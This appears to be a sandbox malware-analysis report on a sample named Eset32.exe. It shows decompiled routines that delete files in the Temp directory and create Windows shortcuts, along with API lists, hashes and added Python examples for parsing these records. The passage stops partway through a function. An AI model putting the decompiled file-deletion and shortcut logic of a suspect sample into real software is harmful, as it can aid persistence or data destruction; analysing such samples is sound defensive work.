                                                          								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                          								if(__eflags == 0) {
                                                          									_t55 = E00405877(__eflags, _t73, _v8);
                                                          									__eflags = _t55;
                                                          									if(_t55 != 0) {
                                                          										E0040521E(0xfffffff2, _t73);
                                                          									} else {
                                                          										__eflags = _v8 - _t55;
                                                          										if(_v8 == _t55) {
                                                          											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                          										} else {
                                                          											E0040521E(0xfffffff1, _t73);
                                                          											E00405ED6(_t72, _t73, 0);
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                          									if(__eflags == 0) {
                                                          										E004058BF(__eflags, _t73, _a8);
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                          							__eflags = _t64;
                                                          							if(_t64 == 0) {
                                                          								goto L27;
                                                          							}
                                                          							__eflags = _t64 - 0x2e;
                                                          							if(_t64 != 0x2e) {
                                                          								goto L19;
                                                          							}
                                                          							__eflags =  *((char*)(_t76 + 2));
                                                          							if( *((char*)(_t76 + 2)) == 0) {
                                                          								goto L27;
                                                          							}
                                                          							goto L19;
                                                          							L27:
                                                          							_t58 = FindNextFileA(_v12,  &_v336);
                                                          							__eflags = _t58;
                                                          						} while (_t58 != 0);
                                                          						_t40 = FindClose(_v12);
                                                          						goto L29;
                                                          					}
                                                          					__eflags =  *0x42b898 - 0x5c;
                                                          					if( *0x42b898 != 0x5c) {
                                                          						goto L11;
                                                          					}
                                                          					goto L10;
                                                          				} else {
                                                          					__eflags = _t40;
                                                          					if(_t40 == 0) {
                                                          						L31:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L39:
                                                          							return _t40;
                                                          						}
                                                          						__eflags = _v16;
                                                          						if(_v16 != 0) {
                                                          							_t40 = E0040646B(_t73);
                                                          							__eflags = _t40;
                                                          							if(_t40 == 0) {
                                                          								goto L39;
                                                          							}
                                                          							E00405A8F(_t73);
                                                          							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                                                          							__eflags = _t40;
                                                          							if(_t40 != 0) {
                                                          								return E0040521E(0xffffffe5, _t73);
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							E0040521E(0xfffffff1, _t73);
                                                          							return E00405ED6(_t72, _t73, 0);
                                                          						}
                                                          						L33:
                                                          						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                          						return _t40;
                                                          					}
                                                          					__eflags = _t69 & 0x00000002;
                                                          					if((_t69 & 0x00000002) == 0) {
                                                          						goto L31;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}
                                                          0x00405942
                                                          0x00405949
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405907
                                                          0x00405907
                                                          0x00405909
                                                          0x00405a36
                                                          0x00405a38
                                                          0x00405a3b
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a3d
                                                          0x00405a40
                                                          0x00405a4b
                                                          0x00405a50
                                                          0x00405a52
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a55
                                                          0x00405a61
                                                          0x00405a66
                                                          0x00405a68
                                                          0x00000000
                                                          0x00405a83
                                                          0x00405a6a
                                                          0x00405a6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a72
                                                          0x00000000
                                                          0x00405a79
                                                          0x00405a42
                                                          0x00405a42
                                                          0x00000000
                                                          0x00405a42
                                                          0x0040590f
                                                          0x00405912
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405912

                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • \*.*, xrefs: 0040592A
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 004058BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-2193212254
                                                          • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                          • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

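The bullets under "APIs" above follow one fixed shape ("Function.Module(args), ref: address"), so a record can be parsed and scored without the sandbox UI. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the seven API lines of the record above (embedded as constructed input), extracts the Windows-path arguments and tags the set when a wildcard enumeration (FindFirstFileA/FindNextFileA with \*.*) is paired with DeleteFileA in the user's Temp directory. The ApiCall class, the tag names and the helper names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed input: the "APIs" bullets of the Temp-directory function record above,
# copied from the report. Each bullet is "<Function>.<Module>(<args>), ref: <hex address>".
SAMPLE_APIS = r"""
• DeleteFileA.KERNEL32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
• lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
• lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
• lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
• FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
• FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
• FindClose.KERNEL32(00000000), ref: 00405A26
"""

API_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# A Windows path: drive letter plus backslash, or a backslash-rooted fragment such as \*.*
WINPATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\)")
ENUM_APIS = {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW"}
DELETE_APIS = {"DeleteFileA", "DeleteFileW"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int


def split_args(s: str) -> List[str]:
    """Split on commas outside double quotes (quoted command lines may contain commas)."""
    if not s.strip():
        return []
    out, cur, in_quotes = [], [], False
    for ch in s:
        if ch == '"':
            in_quotes = not in_quotes
            cur.append(ch)
        elif ch == "," and not in_quotes:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return out


def parse_apis(text: str) -> List[ApiCall]:
    """Parse every well-formed API bullet; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            calls.append(ApiCall(m["func"], m["module"], split_args(m["args"]), int(m["ref"], 16)))
    return calls


def path_args(call: ApiCall) -> List[str]:
    return [a for a in call.args if WINPATH_RE.match(a.strip('"'))]


def classify(calls: List[ApiCall]) -> Set[str]:
    """Coarse tags for one function's API set; '?' is the sandbox's unresolved-argument marker."""
    funcs = {c.func for c in calls}
    tags = set()
    if funcs & ENUM_APIS:
        tags.add("file_enumeration")
    if funcs & DELETE_APIS:
        tags.add("file_delete")
    if any("*" in a for c in calls for a in c.args):
        tags.add("wildcard_pattern")
    if any("\\appdata\\local\\temp\\" in p.lower() for c in calls for p in path_args(c)):
        tags.add("temp_dir")
    return tags


def is_wildcard_temp_delete(calls: List[ApiCall]) -> bool:
    """Wildcard enumeration plus DeleteFile inside the user's Temp directory, as in the record above."""
    return {"file_enumeration", "file_delete", "wildcard_pattern", "temp_dir"} <= classify(calls)


if __name__ == "__main__":
    parsed = parse_apis(SAMPLE_APIS)
    for c in parsed:
        print(f"{c.ref:08X} {c.module}!{c.func} paths={path_args(c)}")
    print(sorted(classify(parsed)), is_wildcard_temp_delete(parsed))
```

Two caveats when reading these bullets: the sandbox prints stack slots beyond the API's real parameter count (DeleteFileA takes one argument, yet five values appear), so only the leading arguments are actual parameters and the rest is spilled caller stack; and `?` marks a value the tracer could not resolve. The classifier therefore looks at the whole argument list instead of relying on positions.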
                                                          C-Code - Quality: 74%
                                                          			E0040216B() {
                                                          				signed int _t55;
                                                          				void* _t59;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr _t64;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t84;
                                                          				int _t87;
                                                          				intOrPtr* _t95;
                                                          				signed int _t105;
                                                          				signed int _t109;
                                                          				void* _t111;
                                                          
                                                          				// _t111 is the frame pointer. _t87 holds 0 throughout (it is passed as pUnkOuter to
                                                          				// CoCreateInstance and as CodePage/dwFlags to MultiByteToWideChar), so every
                                                          				// "< _t87" / ">= _t87" test below is a FAILED(hr) / SUCCEEDED(hr) check.
                                                          				// E00402BCE(n) returns a string pointer; the five results are the .lnk file path,
                                                          				// the target path, the arguments, the icon path and the description used below.
                                                          				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                          				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                          				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                          				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                          				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                          				// Packed option word at ebp-0x18: bits 0-11 icon index, bits 12-14 show command,
                                                          				// bit 15 "skip SetWorkingDirectory", bits 16-31 hotkey.
                                                          				_t55 =  *(_t111 - 0x18);
                                                          				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                          				_t105 = _t55 & 0x00008000;
                                                          				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                          				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                          				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                                                          					E00402BCE(0x21);
                                                          				}
                                                          				// CoCreateInstance(CLSID at 0x408524, NULL, CLSCTX_INPROC_SERVER, IID at 0x408514, &obj);
                                                          				// the interface pointer lands at ebp+8. The vtable offsets used on it below
                                                          				// (0x1c, 0x24, 0x2c, 0x34, 0x3c, 0x44, 0x50) are the IShellLinkA method slots.
                                                          				_t59 = _t111 + 8;
                                                          				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                          				if(_t59 < _t87) {
                                                          					L15:
                                                          					// error path: raise the per-call error flag at ebp-4
                                                          					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					// vtable+0: QueryInterface(IID at 0x408534) -> second interface pointer at ebp-0x30
                                                          					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                          					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                          					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                          					if(_t64 >= _t87) {
                                                          						// vtable+0x50: IShellLinkA::SetPath(target)
                                                          						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                          						if(_t105 == _t87) {
                                                          							// vtable+0x24: IShellLinkA::SetWorkingDirectory (skipped when bit 15 is set)
                                                          							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Roaming");
                                                          						}
                                                          						if(_t109 != _t87) {
                                                          							// vtable+0x3c: IShellLinkA::SetShowCmd(show command from bits 12-14)
                                                          							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                          						}
                                                          						// vtable+0x34: IShellLinkA::SetHotkey(hotkey from the high 16 bits)
                                                          						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                          						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                          						if( *_t95 != _t87) {
                                                          							// vtable+0x44: IShellLinkA::SetIconLocation(icon path, icon index), only if the icon path is non-empty
                                                          							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                          							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                          						}
                                                          						// vtable+0x2c: IShellLinkA::SetArguments
                                                          						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                          						// vtable+0x1c: IShellLinkA::SetDescription
                                                          						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                          						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                          						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          							// default to E_FAIL, widen the .lnk path (ebp-0x38, ANSI) into the 0x400-wide-char
                                                          							// buffer at ebp-0xc, then write the shortcut through vtable+0x18 of the second
                                                          							// interface: IPersistFile::Save(wide path, fRemember = TRUE)
                                                          							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                          							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                          								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                          								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                          							}
                                                          						}
                                                          						// vtable+8: Release on the IPersistFile pointer
                                                          						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                          						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                          					}
                                                          					// vtable+8: Release on the IShellLinkA pointer
                                                          					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				// accumulate the error flag into the global error counter at 0x42f4c8
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 123533781-3453768385
                                                          • Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                          • Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

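The virtual calls in E0040216B appear only as vtable offsets (`*_t67 + 0x50`, `*_t78 + 0x18`). Mapped onto the x86 vtable layouts of IShellLinkA and IPersistFile they spell out a shortcut (.lnk) creation: SetPath, SetWorkingDirectory, SetShowCmd, SetHotkey, SetIconLocation, SetArguments, SetDescription, then IPersistFile::Save. The Python below is an added example, not part of the report: it records which frame slot each object pointer was loaded from (ebp+8 from CoCreateInstance, ebp-0x30 from QueryInterface, both read off the listing) and resolves every `( *_tN + off))(_tN, ...)` call to a method name. The regexes, the slot-to-interface table and the function names are the example's own; the listing is the page's decompiled text trimmed to the pointer loads and calls.

```python
import re
from typing import Dict, List, Tuple

# Constructed input: the pointer-load and indirect-call lines of E0040216B, copied from the
# decompiled listing above; the rest of the function is omitted.
LISTING = r"""
_t63 =  *((intOrPtr*)(_t111 + 8));
_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
_t67 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
_t84 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Roaming");
_t82 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
_t69 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
_t80 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
_t71 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
_t73 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
_t78 =  *((intOrPtr*)(_t111 - 0x30));
 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
_t75 =  *((intOrPtr*)(_t111 - 0x30));
 *((intOrPtr*)( *_t75 + 8))(_t75);
_t65 =  *((intOrPtr*)(_t111 + 8));
 *((intOrPtr*)( *_t65 + 8))(_t65);
"""

# Which frame slot holds which interface pointer, read off the listing: CoCreateInstance
# writes its out-pointer to ebp+8 and the QueryInterface call writes its to ebp-0x30.
SLOT_IFACE: Dict[Tuple[str, int], str] = {("+", 0x8): "IShellLinkA", ("-", 0x30): "IPersistFile"}


def _vtable(*methods: str) -> Dict[int, str]:
    """x86 vtable: IUnknown methods first, then the interface's own, 4 bytes per slot."""
    return {4 * i: name for i, name in enumerate(methods)}


VTABLES: Dict[str, Dict[int, str]] = {
    "IShellLinkA": _vtable(
        "QueryInterface", "AddRef", "Release", "GetPath", "GetIDList", "SetIDList",
        "GetDescription", "SetDescription", "GetWorkingDirectory", "SetWorkingDirectory",
        "GetArguments", "SetArguments", "GetHotkey", "SetHotkey", "GetShowCmd", "SetShowCmd",
        "GetIconLocation", "SetIconLocation", "SetRelativePath", "Resolve", "SetPath"),
    "IPersistFile": _vtable(
        "QueryInterface", "AddRef", "Release", "GetClassID", "IsDirty", "Load", "Save",
        "SaveCompleted", "GetCurFile"),
}

# "_tN =  *((intOrPtr*)(_t111 + 8));"  -> object pointer loaded from a frame slot
ASSIGN_RE = re.compile(r"(_t\d+)\s*=\s*\*\(\(intOrPtr\*\)\((_t\d+)\s*([+-])\s*(0x[0-9a-fA-F]+|\d+)\)\)")
# "( *_tN + 0x50))(_tN, ..." or "( *_tN))(_tN, ..."  -> call through a vtable slot of that object
CALL_RE = re.compile(r"\(\s*\*(_t\d+)(?:\s*\+\s*(0x[0-9a-fA-F]+|\d+))?\)\)\((_t\d+)")


def resolve_vtable_calls(listing: str) -> List[Tuple[str, str, int, str]]:
    """Return (variable, interface, vtable offset, method) for each virtual call, in listing order."""
    var_iface: Dict[str, str] = {}
    resolved = []
    for line in listing.splitlines():
        m = ASSIGN_RE.search(line)
        if m:
            var, _base, sign, off = m.groups()
            iface = SLOT_IFACE.get((sign, int(off, 0)))
            if iface:
                var_iface[var] = iface
        m = CALL_RE.search(line)
        if m and m.group(1) == m.group(3):  # the 'this' argument must be the dereferenced object
            var, off = m.group(1), (int(m.group(2), 0) if m.group(2) else 0)
            iface = var_iface.get(var, "unknown")
            method = VTABLES.get(iface, {}).get(off, f"vtbl+{off:#x}")  # never guess unknown slots
            resolved.append((var, iface, off, method))
    return resolved


def method_sequence(listing: str) -> List[str]:
    return [f"{iface}::{method}" for _, iface, _, method in resolve_vtable_calls(listing)]


if __name__ == "__main__":
    for var, iface, off, method in resolve_vtable_calls(LISTING):
        print(f"{var:6} {iface:13} vtbl+{off:#04x}  {method}")
```

The same approach carries over to any decompiled COM sequence: fill SLOT_IFACE from the CoCreateInstance and QueryInterface out-pointers and add the relevant vtable. Offsets that resolve to no known method are reported as `vtbl+0x..` rather than guessed, and a call whose `this` argument differs from the dereferenced pointer is not counted as a virtual call on that object.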
                                                          C-Code - Quality: 100%
                                                          			E0040646B(CHAR* _a4) {
                                                          				void* _t2;
                                                          
                                                          				// Existence check: FindFirstFileA fills the global WIN32_FIND_DATAA at 0x42c0e0.
                                                          				_t2 = FindFirstFileA(_a4, 0x42c0e0);
                                                          				if(_t2 == 0xffffffff) {
                                                          					// INVALID_HANDLE_VALUE: nothing matched the path or pattern
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t2);
                                                          				// match found: hand back the filled-in find data (attributes, size, times, cFileName)
                                                          				return 0x42c0e0;
                                                          			}

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(76DDFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNEL32(00000000), ref: 00406482
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                          				void* _t19;
                                                          
                                                          				// Low-quality decompile: _t19 is the frame pointer (never assigned in this listing) and
                                                          				// _t6 is an unresolved register, most likely the search handle FindFirstFileA returned.
                                                          				// The WIN32_FIND_DATAA sits at ebp-0x1d0; ebp-0x1a4 is its cFileName member (offset 0x2c).
                                                          				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                          					E00406055(__edi, _t6);
                                                          					_push(_t19 - 0x1a4);
                                                          					_push(__esi);
                                                          					E004060F7();
                                                          				} else {
                                                          					// no match: store __ebx into both output strings and raise the error flag at ebp-4
                                                          					 *__edi = __ebx;
                                                          					 *__esi = __ebx;
                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                          				}
                                                          				// accumulate the error flag into the global error counter at 0x42f4c8
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E00406945(signed int __ebx, signed int* __esi) {
                                                          				signed int _t396;
                                                          				signed int _t425;
                                                          				signed int _t442;
                                                          				signed int _t443;
                                                          				signed int* _t446;
                                                          				void* _t448;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t446 = __esi;
                                                          					_t425 = __ebx;
                                                          					if( *(_t448 - 0x34) == 0) {
                                                          						break;
                                                          					}
                                                          					L55:
                                                          					__eax =  *(__ebp - 0x38);
                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          					__ecx = __ebx;
                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          					__ebx = __ebx + 8;
                                                          					while(1) {
                                                          						L56:
                                                          						if(__ebx < 0xe) {
                                                          							goto L0;
                                                          						}
                                                          						L57:
